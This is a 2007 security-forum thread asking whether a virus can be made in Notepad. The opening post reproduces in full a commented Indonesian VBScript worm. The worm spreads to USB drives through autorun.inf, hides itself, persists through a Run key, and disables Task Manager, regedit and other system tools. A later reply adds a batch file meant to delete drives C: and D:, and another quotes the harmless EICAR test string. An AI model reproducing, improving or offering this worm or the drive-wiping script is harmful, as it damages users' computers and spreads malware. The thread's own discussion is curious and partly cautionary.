Author Topic: can we really make a virus on notepad?  (Read 79285 times)

Offline ganda

  • thermodynamic defier
  • Comodo's Hero
  • *****
  • Posts: 5894
can we really make a virus on notepad?
« on: September 18, 2007, 01:25:18 AM »
hi, got this on indonesian forum (and it's in indonesian languange too) :
the instruction is : just copy-paste this code to "notepad" and "save as"

'//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next

'//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,sial,nt,check,sd

‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe 51AL.doc.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\51AL.doc.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\51AL.doc.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\51AL.doc.vbs “)
tf.attributes = 39

‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\51AL.doc.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\51AL.doc.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\51AL.doc.vbs “)
tf.attributes = 39

‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘//–Manipulasi Registry–//
set sial = createobject(”WScript.Shell”)
‘//–Manip - Ubah CAPTION Internet Explorer menjadi THE EMperOR of 51AL//
sial.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE EMperOR of 51AL “

‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
sial.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,
“0″, “REG_DWORD”

‘//–Manip – Hilangkan menu Find, Folder Options, Run,  dan memblokir Regedit dan Task Manager–//
sial.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
sial.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”,
“1″, “REG_DWORD”
sial.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
sial.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”,
“1″, “REG_DWORD”
sial.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

‘//–Manip – Disable klik kanan–//
sial.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”,
“1″, “REG_DWORD”

‘//–Manip - Munculkan Pesan Setiap Windows Startup–//
sial.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption”,
“THE EMperOR of 51AL.”
sial.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”,
“51AL datang......51AL lihat.......51AL menang!!!!”

‘//–Manip – Aktif setiap Windows Startup–//
sial.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”,
windowpath & “\51AL.doc.vbs “

‘//–Manip – Ubah RegisteredOwner dan Organization–//
sial.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Emperor”
sial.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”51AL”

if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode


 ???  ???  ???  ???  ??? can it be done? this is scary.

Ganda
« Last Edit: September 18, 2007, 01:28:26 AM by ganda »

Offline gordon

  • Comodo's Hero
  • *****
  • Posts: 251
Re: can we really make a virus on notepad?
« Reply #1 on: September 18, 2007, 08:33:20 AM »
And this is supposed to do what ?
thanks a lot for the great documentation ..

Offline ganda

  • thermodynamic defier
  • Comodo's Hero
  • *****
  • Posts: 5894
Re: can we really make a virus on notepad?
« Reply #2 on: September 18, 2007, 10:03:47 AM »
i don't know. the instruction is :
"if you wanna create a virus on notepad, it's easy. just copy-paste this code (don't forget to activate your AV, AVG can detect it, but mc afee didn't)".

and followed by the code.... bla bla bla bla,

and last, "save as this code and name it something.vbs" (i forgot the exact name).

the actual code is too long, i think it's automatically cut off in this post.


Offline aladinonl

  • Comodo's Hero
  • *****
  • Posts: 331
Re: can we really make a virus on notepad?
« Reply #3 on: September 18, 2007, 12:12:25 PM »
i think the code should b in English if ur OS is in English.

since the code is in Indonesian, I suppose the writer aim at Indonesian OS version or at least the OS which got installed Bahasa Indonesian.

Im blind in programming so just my 2c.
small minds discuss people, normal minds discuss events, great minds discuss ideas

Offline eXPerience

  • Left the Forums
  • Comodo's Hero
  • *****
  • Posts: 6958
  • Free Forever !
Re: can we really make a virus on notepad?
« Reply #4 on: September 18, 2007, 02:19:58 PM »
Quote
can we really make a virus on notepad?

Yep we can :P.
The easiest one is this one.

[at]echo off

DEL C: -Y
DEL D: -Y

Save this as 'whateveryouwant'.bat

As you can see it just deletes your hard drive, it can be made more difficult etc so you cant see it, and it can be attached to thing etc but I'm not going to say more 'cous they're going to think that I made that latest virus  ;) lol.
This is all I know of batmaking  :-\.

Hope I didn't scare you to much lol
Xan

Offline Justin L.

  • Global Moderator
  • Comodo's Hero
  • *****
  • Posts: 3110
Re: can we really make a virus on notepad?
« Reply #5 on: September 18, 2007, 03:30:57 PM »
Hello,

Yes it is possible to create simple viruses in notepad or any text editor for that matter.

Justin
Windows 8 64-bit; Intel Core i3 2350 [at] 2.30 GHz w/ 6GB RAM
CIS 6.1.276867.2813 - Complete

Offline ganda

  • thermodynamic defier
  • Comodo's Hero
  • *****
  • Posts: 5894
Re: can we really make a virus on notepad?
« Reply #6 on: September 18, 2007, 08:54:14 PM »
wow! i didn't know that before. i'm not a techie but i'm really interested in virus/av programming, i've bought  books about virus & antivirus programming, (haven't read it yet), but they're all about visual basic virus/AV programming.

Yep we can :P.
The easiest one is this one.

 [ at ] echo off

DEL C: -Y
DEL D: -Y

Save this as 'whateveryouwant'.bat

As you can see it just deletes your hard drive, it can be made more difficult etc so you cant see it, and it can be attached to thing etc but I'm not going to say more 'cous they're going to think that I made that latest virus  ;) lol.
This is all I know of batmaking  :-\.

Hope I didn't scare you to much lol
Xan
WOW!!! i AM afraid.

Hello,

Yes it is possible to create simple viruses in notepad or any text editor for that matter.

Justin

and can this "simple text editor virus" be removed by our AV? or it's classified as new virus (zero day)?

 

Offline gordon

  • Comodo's Hero
  • *****
  • Posts: 251
Re: can we really make a virus on notepad?
« Reply #7 on: September 19, 2007, 07:40:05 AM »
That is not a virus, it's just a nasty bat-file .
also, the original example is actually a .vbs-script and you can write those
in any text-editor..but just because it does something nasty doesn't necessarily make it a virus .

here's a .txt "virus" ..
(it doesn't DO anything, read about it here : http://www.eicar.org/anti_virus_test_file.htm)
Code: [Select]
X5O!P%[at]AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Offline ganda

  • thermodynamic defier
  • Comodo's Hero
  • *****
  • Posts: 5894
Re: can we really make a virus on notepad?
« Reply #8 on: September 19, 2007, 07:45:47 PM »
That is not a virus, it's just a nasty bat-file .
also, the original example is actually a .vbs-script and you can write those
in any text-editor..but just because it does something nasty doesn't necessarily make it a virus .

here's a .txt "virus" ..
(it doesn't DO anything, read about it here : http://www.eicar.org/anti_virus_test_file.htm)
Code: [Select]
X5O!P% [ at ] AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

SCARIER!! if we can really attach it to another file, make it invisible, and it's not categorized as a virus (AV can't detects it) it freaks me!

Important note: EICAR cannot be held responsible when these files or your AV scanner in combination with these files cause any damage to your computer. YOU DOWNLOAD THESE FILES AT YOUR OWN RISK. Download these files only if you are sufficiently secure in the usage of your AV scanner. EICAR cannot and will not provide any help to remove these files from your computer. Please contact the manufacturer/vendor of your AV scanner to seek such help.

that scares me too ;D

Ganda

Offline eXPerience

  • Left the Forums
  • Comodo's Hero
  • *****
  • Posts: 6958
  • Free Forever !
Re: can we really make a virus on notepad?
« Reply #9 on: September 20, 2007, 01:35:11 AM »
Quote
can it be done? this is scary.
Quote
WOW!!! i AM afraid.
Quote
SCARIER!! if we can really attach it to another file, make it invisible, and it's not categorized as a virus (AV can't detects it) it freaks me!
Quote
that scares me too

LOL looks like you're 'scaried'  ;) ;) ;) ;D ;D ;D

Offline ganda

  • thermodynamic defier
  • Comodo's Hero
  • *****
  • Posts: 5894
Re: can we really make a virus on notepad?
« Reply #10 on: September 20, 2007, 01:45:32 AM »
LOL ;D ;D ;D

Offline gordon

  • Comodo's Hero
  • *****
  • Posts: 251
Re: can we really make a virus on notepad?
« Reply #11 on: September 20, 2007, 10:20:21 AM »
to the moderators :
could you please fix the board-software so it doesn't mess with the formatting
of text that is in "code"-format ? f.ex you can not use the "[at]" symbol (see my point?)

Good that people are afraid .. makes it easier for the AV-manufacturers to get
to your hard-earned cash ..
The number one reason for virus-infections is still people double-clicking on
executable files originating from an evil source and/or using a m$ OS with the default settings .

soyabeaner

  • Guest
Re: can we really make a virus on notepad?
« Reply #12 on: September 20, 2007, 05:36:50 PM »
to the moderators :
could you please fix the board-software so it doesn't mess with the formatting
of text that is in "code"-format ? f.ex you can not use the " [ at ] " symbol (see my point?)

Well, some of us did change it so you can use the at symbol, but I think the admins wanted to leave it this way to help prevent spambots from harvesting emails in the forum.

Offline Japo

  • Autonomous Human
  • Comodo's Hero
  • *****
  • Posts: 1773
  • Life starts every day anew. Prospects not so good.
Re: can we really make a virus on notepad?
« Reply #13 on: September 20, 2007, 07:53:35 PM »
I think he means skipping that only for text within "code" BB tags, while leave it working otherwise.
Windows users do not disable UAC

soyabeaner

  • Guest
Re: can we really make a virus on notepad?
« Reply #14 on: September 20, 2007, 07:55:44 PM »
I see.  I would also like that, but I don't know if even the admins can control that due to the SMF being maintained by another party.  We can only hope (that and a slew of other forum requests) :THNK

Edit: I see that someone actually thought of a workaround to generate the @ symbol :): you have to type [at-bypass ] --> ignore the last space in there; it was put there ∴ the @ wouldn't be generated.
« Last Edit: September 20, 2007, 08:05:21 PM by Soya Lv. 3 »

 

Seo4Smf 2.0 © SmfMod.Com Smf Destek